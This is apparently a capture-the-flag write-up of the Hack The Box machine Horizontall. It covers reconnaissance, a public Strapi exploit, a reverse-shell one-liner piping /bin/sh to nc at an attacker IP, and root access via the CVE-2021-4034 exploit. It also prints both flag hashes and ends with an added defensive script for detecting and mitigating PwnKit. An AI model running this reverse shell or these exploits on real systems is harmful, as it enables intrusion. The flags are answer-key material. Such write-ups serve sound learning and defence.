Description
Horizontall from HTB.
nmap
    nmap -sV -p- 10.10.11.105

    22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Port 80
It’s forbidden, so I have to add the DNS name to:

    /etc/hosts
Javascript
The file /js/app.c68eb462.js is obfuscated, so I have to use a tool to read it.
https://lelinhtinh.github.io/de4js/
I found the link http://api-prod.horizontall.htb/reviews
I have to add it to my /etc/hosts file.
gobuster
    gobuster dir -u http://api-prod.horizontall.htb/ -w Documents/wordlist/directory-list-2.3-small.txt -t 150 --wildcard switch | grep "(Status:"

    /admin (Status: 200) [Size: 854]
In /admin we have the Strapi login page.
In /reviews we have a JSON file.

exploit strapi
https://www.exploit-db.com/exploits/50239
    python3 50239.py http://api-prod.horizontall.htb
The shell is broken but we have the creds.
    [+] Password reset was successfully
One week later…
OK, the credentials are useless, so I have to use the blind RCE.
On my computer:
    nc -nlvp 4242
Blind RCE:
    rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.214 4242 >/tmp/f
And I’m in.

Strapi shell
In /home/developer/user.txt:
e6cb8f6f0831dc40507c330d548ea384
exploit
Upload
Look at this boy, it’s so cool
    dragon *

Make
This is a new exploit, released 2 days ago.
https://github.com/berdav/CVE-2021-4034

I’m using dragon to drag and drop my files.

    cat /root/root.txt
373da3c143300dec7f9357b24c8b202a
I really feel like a god xD. Every computer is vulnerable, you have to update your system. When I started the box the exploit was not available.
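
A defender-side check for the polkit bug used above (CVE-2021-4034), added here as an example and not part of the original write-up or the linked repository: it reports whether `pkexec` still carries the SUID bit and counts the pkexec log messages that the Qualys advisory lists as traces of the known exploitation technique. The function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: triage a host for CVE-2021-4034 (polkit pkexec).

# Constructed sample auth.log lines (not taken from the box).
SAMPLE_LOG='Jan 27 10:01:12 web sshd[811]: Accepted publickey for deploy from 10.0.0.5 port 50122 ssh2
Jan 27 10:03:40 web pkexec[1432]: webuser: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/tmp] [COMMAND=/tmp/x]
Jan 27 10:04:02 web pkexec[1490]: webuser: The value for environment variable XAUTHORITY contains suspicious content [USER=root] [TTY=/dev/pts/0] [CWD=/tmp] [COMMAND=/usr/bin/id]
Jan 27 10:05:00 web pkexec[1502]: pam_unix(polkit-1:session): session opened for user root by (uid=1000)'

# Count pkexec log lines carrying either warning message. Reads log text
# on stdin. Matching on the stable prefix of each message keeps the check
# independent of the exact wording of the tail.
pwnkit_log_hits() {
    grep -E 'pkexec(\[[0-9]+\])?:' |
    grep -cE 'The value for the SHELL variable was not found|The value for environment variable .* contains' || true
}

# Report the state of a pkexec binary: the bug is only reachable while the
# binary is SUID, so "no-suid" means the interim mitigation is in place.
# The optional path argument exists so the check can be pointed at a
# non-default install location.
pkexec_state() {
    bin=${1:-/usr/bin/pkexec}
    if [ ! -e "$bin" ]; then
        echo absent
    elif [ -u "$bin" ]; then
        echo suid
    else
        echo no-suid
    fi
}

echo "pkexec state on this host: $(pkexec_state)"
echo "suspicious pkexec lines in sample: $(printf '%s\n' "$SAMPLE_LOG" | pwnkit_log_hits)"
```

A count of zero does not clear a host, since the advisory notes the bug can also be exploited without leaving these messages. Until polkit is patched, removing the SUID bit with `chmod 0755 /usr/bin/pkexec` is the interim mitigation.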